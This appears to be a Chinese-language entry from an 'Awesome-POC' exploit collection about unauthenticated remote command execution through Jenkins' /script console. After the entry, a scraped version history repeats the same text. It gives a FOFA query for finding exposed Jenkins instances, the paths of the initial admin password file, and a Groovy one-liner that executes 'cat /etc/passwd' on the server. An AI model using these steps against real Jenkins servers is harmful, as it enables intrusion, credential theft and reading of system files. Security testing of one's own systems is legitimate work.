Awesome-POC/Web服务器漏洞/Jenkins script 未授权远程命令执行漏洞.md

# Jenkins script 未授权远程命令执行漏洞

## 漏洞描述

Jenkins 登录后访问 /script 页面，其中存在命令执行漏洞，当存在未授权的情况时导致服务器被入侵

## 漏洞影响

```
Jenkins
```

## 网络测绘

```
app="Jenkins"
```

## 漏洞复现

账号密码存在于：

```
Linux: /var/lib/jenkins/secrets/initialAdminPassword
Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword
```

登录后台，或在未授权的情况下访问

```
http://xxx.xxx.xxx.xxx/script
```

在脚本命命令模块执行系统命令

```
println 'cat /etc/passwd'.execute().text
```

![image-20220525163148014](./images/202205251631073.png)
更新漏洞 2023-03-06 15:40:40 +08:00			`# Jenkins script 未授权远程命令执行漏洞`
更新漏洞库：Web服务器漏洞/ 2022-05-25 16:51:48 +08:00
			`## 漏洞描述`

			`Jenkins 登录后访问 /script 页面，其中存在命令执行漏洞，当存在未授权的情况时导致服务器被入侵`

			`## 漏洞影响`

			```
			`Jenkins`
			```

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
更新漏洞库：Web服务器漏洞/ 2022-05-25 16:51:48 +08:00
			```
			`app="Jenkins"`
			```

			`## 漏洞复现`

			`账号密码存在于：`

			```
			`Linux: /var/lib/jenkins/secrets/initialAdminPassword`
			`Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword`
			```

			`登录后台，或在未授权的情况下访问`

			```
			`http://xxx.xxx.xxx.xxx/script`
			```

			`在脚本命命令模块执行系统命令`

			```
			`println 'cat /etc/passwd'.execute().text`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![image-20220525163148014](./images/202205251631073.png)`